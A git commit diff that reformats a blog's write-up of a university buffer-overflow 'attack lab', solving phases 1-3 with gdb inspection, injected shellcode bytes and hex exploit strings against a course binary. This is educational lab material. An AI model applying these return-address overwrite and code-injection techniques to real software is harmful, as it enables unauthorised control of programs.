From 5a4f10383b939a5ba78db9d293f6a3d724e3f2a0 Mon Sep 17 00:00:00 2001 From: Navan Chauhan Date: Tue, 17 Oct 2023 15:18:40 -0600 Subject: formatting --- Content/posts/2023-10-05-attack-lab.md | 30 +++-- docs/feed.rss | 213 +++++++++++++++++++-------------- docs/posts/2023-10-05-attack-lab.html | 209 ++++++++++++++++++-------------- 3 files changed, 260 insertions(+), 192 deletions(-) diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md index 1f87aca..c4af406 100644 --- a/Content/posts/2023-10-05-attack-lab.md +++ b/Content/posts/2023-10-05-attack-lab.md @@ -42,14 +42,14 @@ We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to ` Now, since we know the buffer size we can try passing the address of the touch1 function. -``` +```bash jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1 000000000040261e : ``` We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)' little ``` @@ -63,7 +63,7 @@ We have our padding size and the function we need to call, we can write it in `c 1e 26 40 00 00 00 00 00 ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch1!: You called touch1() @@ -100,14 +100,14 @@ however, you must make it appear to touch2 as if you have passed your cookie as This hint tells us that we need to store the cookie in the rdi register -``` +```asm movq $0x3e8dee8f,%rdi retq ``` To get the byte representation, we need to compile the code and then disassemble it. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o phase2.s: Assembler messages: phase2.s: Warning: end of file not at end of a line; newline inserted @@ -140,7 +140,7 @@ We need to find the address of `%rsp` after calling `` and sending a reall What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. @@ -197,7 +197,7 @@ address of touch2 function To get the address of `touch2` we can run: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2 000000000040264e : 402666: 74 2a je 402692 @@ -214,7 +214,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, -``` +```bash joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch2!: You called touch2(0x3e8dee8f) @@ -238,8 +238,13 @@ where you place the string representation of your cookie. Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself. +The rationale is simple: by the time our payload is executed, we will be setting `%rdi` to point to the cookie. Placing the cookie after `touch3` function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets. + => The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex) +* Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the `touch3` function) +* Touch 3 (8 bytes): The address of the `touch3` function is 8 bytes long. + We can use our address for `%rsp` from phase 2, and simply add `0x28` to it. => `0x55621b40` + `0x28` = `0x55621B68` @@ -251,7 +256,7 @@ movq $0x55621B68, %rdi retq ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o phase3.s: Assembler messages: phase3.s: Warning: end of file not at end of a line; newline inserted @@ -278,7 +283,7 @@ cookie string To quickly get the address for `touch3` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3 0000000000402763 : 402781: 74 2d je 4027b0 @@ -287,7 +292,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to We need to use an ASCII to Hex converter to convert the cookie string into hex. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p 3365386465653866 ``` @@ -303,7 +308,8 @@ Thus, our cookie string representation is `33 65 38 64 65 65 38 66` 33 65 38 64 65 65 38 66 ``` -``` + +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch3!: You called touch3("3e8dee8f") diff --git a/docs/feed.rss b/docs/feed.rss index 212045a..268c5ec 100644 --- a/docs/feed.rss +++ b/docs/feed.rss @@ -4,8 +4,8 @@ Navan's Archive Rare Tips, Tricks and Posts https://web.navan.dev/en - Tue, 17 Oct 2023 14:53:31 -0000 - Tue, 17 Oct 2023 14:53:31 -0000 + Tue, 17 Oct 2023 15:18:29 -0000 + Tue, 17 Oct 2023 15:18:29 -0000 250 @@ -1412,15 +1412,19 @@ Serving HTTP on 0.0.0.0 port 8000 ...

Now, since we know the buffer size we can try passing the address of the touch1 function.

-
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
-000000000040261e <touch1>:
+
+
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
+000000000040261e <touch1>:
 
+

We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
 little
 
+

We have our padding size and the function we need to call, we can write it in ctarget.l1.txt

@@ -1430,13 +1434,15 @@ little 1e 26 40 00 00 00 00 00
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch1!: You called touch1()
-Valid solution for level 1 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch1!: You called touch1()
+Valid solution for level 1 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 2

@@ -1475,25 +1481,29 @@ NICE JOB!

This hint tells us that we need to store the cookie in the rdi register

-
movq $0x3e8dee8f,%rdi 
-retq
+
+
movq $0x3e8dee8f,%rdi 
+retq
 
+

To get the byte representation, we need to compile the code and then disassemble it.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
-phase2.s: Assembler messages:
-phase2.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
+phase2.s: Assembler messages:
+phase2.s: Warning: end of file not at end of a line; newline inserted
 
-phase2.o:     file format elf64-x86-64
+phase2.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
-   7:   c3                      ret    
+0000000000000000 <.text>:
+   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
+   7:   c3                      ret    
 
+

Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3

@@ -1512,48 +1522,50 @@ Disassembly of section .text:

What we are going to do now is to add a break on getbuf, and run the program just after it asks us to enter a string and then find the address of %rsp

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
-GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-Copyright (C) 2022 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law.
-Type "show copying" and "show warranty" for details.
-This GDB was configured as "x86_64-linux-gnu".
-Type "show configuration" for configuration details.
-For bug reporting instructions, please see:
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
 <https://www.gnu.org/software/gdb/bugs/>.
-Find the GDB manual and other documentation resources online at:
-    <http://www.gnu.org/software/gdb/documentation/>.
-
-For help, type "help".
-Type "apropos word" to search for commands related to "word"...
-Reading symbols from ./ctarget...
-(gdb) b getbuf
-Breakpoint 1 at 0x402608: file buf.c, line 12.
-(gdb) run
-Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
-Cookie: 0x3e8dee8f
-
-Breakpoint 1, getbuf () at buf.c:12
-12      buf.c: No such file or directory.
-(gdb) disas
-Dump of assembler code for function getbuf:
-=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
-   0x000000000040260c <+4>:     mov    %rsp,%rdi
-   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
-   0x0000000000402614 <+12>:    mov    $0x1,%eax
-   0x0000000000402619 <+17>:    add    $0x18,%rsp
-   0x000000000040261d <+21>:    ret    
-End of assembler dump.
-(gdb) until *0x402614
-Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
-getbuf () at buf.c:15
-15      in buf.c
-(gdb) x/s $rsp
-0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
-(gdb)
+Find the GDB manual and other documentation resources online at:
+    <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./ctarget...
+(gdb) b getbuf
+Breakpoint 1 at 0x402608: file buf.c, line 12.
+(gdb) run
+Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
+Cookie: 0x3e8dee8f
+
+Breakpoint 1, getbuf () at buf.c:12
+12      buf.c: No such file or directory.
+(gdb) disas
+Dump of assembler code for function getbuf:
+=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
+   0x000000000040260c <+4>:     mov    %rsp,%rdi
+   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
+   0x0000000000402614 <+12>:    mov    $0x1,%eax
+   0x0000000000402619 <+17>:    add    $0x18,%rsp
+   0x000000000040261d <+21>:    ret    
+End of assembler dump.
+(gdb) until *0x402614
+Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
+getbuf () at buf.c:15
+15      in buf.c
+(gdb) x/s $rsp
+0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
+(gdb)
 
+

So, the address for %rsp is 0x55621b40

@@ -1567,11 +1579,13 @@ address of touch2 function

To get the address of touch2 we can run:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
-000000000040264e <touch2>:
-  402666:       74 2a                   je     402692 <touch2+0x44>
-  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
+000000000040264e <touch2>:
+  402666:       74 2a                   je     402692 <touch2+0x44>
+  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
 
+
48 c7 c7 8f ee 8d 3e c3
 00 00 00 00 00 00 00 00
@@ -1582,13 +1596,15 @@ address of touch2 function
 
 

Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,

-
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch2!: You called touch2(0x3e8dee8f)
-Valid solution for level 2 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch2!: You called touch2(0x3e8dee8f)
+Valid solution for level 2 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 3

@@ -1613,8 +1629,15 @@ NICE JOB!

Because hexmatch and strncmp might overwrite the buffer allocated for getbuf we will try to store the data after the function touch3 itself.

+

The rationale is simple: by the time our payload is executed, we will be setting %rdi to point to the cookie. Placing the cookie after touch3 function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.

+

=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)

+
    +
  • Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the touch3 function)
  • +
  • Touch 3 (8 bytes): The address of the touch3 function is 8 bytes long.
  • +
+

We can use our address for %rsp from phase 2, and simply add 0x28 to it.

=> 0x55621b40 + 0x28 = 0x55621B68

@@ -1627,19 +1650,21 @@ NICE JOB!
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
-phase3.s: Assembler messages:
-phase3.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
+phase3.s: Assembler messages:
+phase3.s: Warning: end of file not at end of a line; newline inserted
 
-phase3.o:     file format elf64-x86-64
+phase3.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
-   7:   c3                      ret
+0000000000000000 <.text>:
+   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
+   7:   c3                      ret
 
+

Thus, our answer is going to be in the form:

@@ -1652,17 +1677,21 @@ cookie string

To quickly get the address for touch3

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
-0000000000402763 <touch3>:
-  402781:       74 2d                   je     4027b0 <touch3+0x4d>
-  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
+0000000000402763 <touch3>:
+  402781:       74 2d                   je     4027b0 <touch3+0x4d>
+  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
 
+

We need to use an ASCII to Hex converter to convert the cookie string into hex.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
-3365386465653866
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
+3365386465653866
 
+

Thus, our cookie string representation is 33 65 38 64 65 65 38 66

@@ -1674,13 +1703,15 @@ cookie string 33 65 38 64 65 65 38 66
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch3!: You called touch3("3e8dee8f")
-Valid solution for level 3 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch3!: You called touch3("3e8dee8f")
+Valid solution for level 3 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phases 1-3 Complete.

]]> diff --git a/docs/posts/2023-10-05-attack-lab.html b/docs/posts/2023-10-05-attack-lab.html index 393951b..67d17ca 100644 --- a/docs/posts/2023-10-05-attack-lab.html +++ b/docs/posts/2023-10-05-attack-lab.html @@ -78,15 +78,19 @@

Now, since we know the buffer size we can try passing the address of the touch1 function.

-
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
-000000000040261e <touch1>:
+
+
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
+000000000040261e <touch1>:
 
+

We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
 little
 
+

We have our padding size and the function we need to call, we can write it in ctarget.l1.txt

@@ -96,13 +100,15 @@ little 1e 26 40 00 00 00 00 00
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch1!: You called touch1()
-Valid solution for level 1 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch1!: You called touch1()
+Valid solution for level 1 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 2

@@ -141,25 +147,29 @@ NICE JOB!

This hint tells us that we need to store the cookie in the rdi register

-
movq $0x3e8dee8f,%rdi 
-retq
+
+
movq $0x3e8dee8f,%rdi 
+retq
 
+

To get the byte representation, we need to compile the code and then disassemble it.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
-phase2.s: Assembler messages:
-phase2.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
+phase2.s: Assembler messages:
+phase2.s: Warning: end of file not at end of a line; newline inserted
 
-phase2.o:     file format elf64-x86-64
+phase2.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
-   7:   c3                      ret    
+0000000000000000 <.text>:
+   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
+   7:   c3                      ret    
 
+

Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3

@@ -178,48 +188,50 @@ Disassembly of section .text:

What we are going to do now is to add a break on getbuf, and run the program just after it asks us to enter a string and then find the address of %rsp

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
-GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-Copyright (C) 2022 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law.
-Type "show copying" and "show warranty" for details.
-This GDB was configured as "x86_64-linux-gnu".
-Type "show configuration" for configuration details.
-For bug reporting instructions, please see:
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
 <https://www.gnu.org/software/gdb/bugs/>.
-Find the GDB manual and other documentation resources online at:
-    <http://www.gnu.org/software/gdb/documentation/>.
-
-For help, type "help".
-Type "apropos word" to search for commands related to "word"...
-Reading symbols from ./ctarget...
-(gdb) b getbuf
-Breakpoint 1 at 0x402608: file buf.c, line 12.
-(gdb) run
-Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
-Cookie: 0x3e8dee8f
-
-Breakpoint 1, getbuf () at buf.c:12
-12      buf.c: No such file or directory.
-(gdb) disas
-Dump of assembler code for function getbuf:
-=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
-   0x000000000040260c <+4>:     mov    %rsp,%rdi
-   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
-   0x0000000000402614 <+12>:    mov    $0x1,%eax
-   0x0000000000402619 <+17>:    add    $0x18,%rsp
-   0x000000000040261d <+21>:    ret    
-End of assembler dump.
-(gdb) until *0x402614
-Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
-getbuf () at buf.c:15
-15      in buf.c
-(gdb) x/s $rsp
-0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
-(gdb)
+Find the GDB manual and other documentation resources online at:
+    <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./ctarget...
+(gdb) b getbuf
+Breakpoint 1 at 0x402608: file buf.c, line 12.
+(gdb) run
+Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
+Cookie: 0x3e8dee8f
+
+Breakpoint 1, getbuf () at buf.c:12
+12      buf.c: No such file or directory.
+(gdb) disas
+Dump of assembler code for function getbuf:
+=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
+   0x000000000040260c <+4>:     mov    %rsp,%rdi
+   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
+   0x0000000000402614 <+12>:    mov    $0x1,%eax
+   0x0000000000402619 <+17>:    add    $0x18,%rsp
+   0x000000000040261d <+21>:    ret    
+End of assembler dump.
+(gdb) until *0x402614
+Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
+getbuf () at buf.c:15
+15      in buf.c
+(gdb) x/s $rsp
+0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
+(gdb)
 
+

So, the address for %rsp is 0x55621b40

@@ -233,11 +245,13 @@ address of touch2 function

To get the address of touch2 we can run:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
-000000000040264e <touch2>:
-  402666:       74 2a                   je     402692 <touch2+0x44>
-  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
+000000000040264e <touch2>:
+  402666:       74 2a                   je     402692 <touch2+0x44>
+  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
 
+
48 c7 c7 8f ee 8d 3e c3
 00 00 00 00 00 00 00 00
@@ -248,13 +262,15 @@ address of touch2 function
 
 

Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,

-
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch2!: You called touch2(0x3e8dee8f)
-Valid solution for level 2 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch2!: You called touch2(0x3e8dee8f)
+Valid solution for level 2 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 3

@@ -279,8 +295,15 @@ NICE JOB!

Because hexmatch and strncmp might overwrite the buffer allocated for getbuf we will try to store the data after the function touch3 itself.

+

The rationale is simple: by the time our payload is executed, we will be setting %rdi to point to the cookie. Placing the cookie after touch3 function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.

+

=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)

+
    +
  • Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the touch3 function)
  • +
  • Touch 3 (8 bytes): The address of the touch3 function is 8 bytes long.
  • +
+

We can use our address for %rsp from phase 2, and simply add 0x28 to it.

=> 0x55621b40 + 0x28 = 0x55621B68

@@ -293,19 +316,21 @@ NICE JOB!
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
-phase3.s: Assembler messages:
-phase3.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
+phase3.s: Assembler messages:
+phase3.s: Warning: end of file not at end of a line; newline inserted
 
-phase3.o:     file format elf64-x86-64
+phase3.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
-   7:   c3                      ret
+0000000000000000 <.text>:
+   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
+   7:   c3                      ret
 
+

Thus, our answer is going to be in the form:

@@ -318,17 +343,21 @@ cookie string

To quickly get the address for touch3

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
-0000000000402763 <touch3>:
-  402781:       74 2d                   je     4027b0 <touch3+0x4d>
-  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
+0000000000402763 <touch3>:
+  402781:       74 2d                   je     4027b0 <touch3+0x4d>
+  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
 
+

We need to use an ASCII to Hex converter to convert the cookie string into hex.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
-3365386465653866
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
+3365386465653866
 
+

Thus, our cookie string representation is 33 65 38 64 65 65 38 66

@@ -340,13 +369,15 @@ cookie string 33 65 38 64 65 65 38 66
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch3!: You called touch3("3e8dee8f")
-Valid solution for level 3 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch3!: You called touch3("3e8dee8f")
+Valid solution for level 3 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phases 1-3 Complete.

-- cgit v1.2.3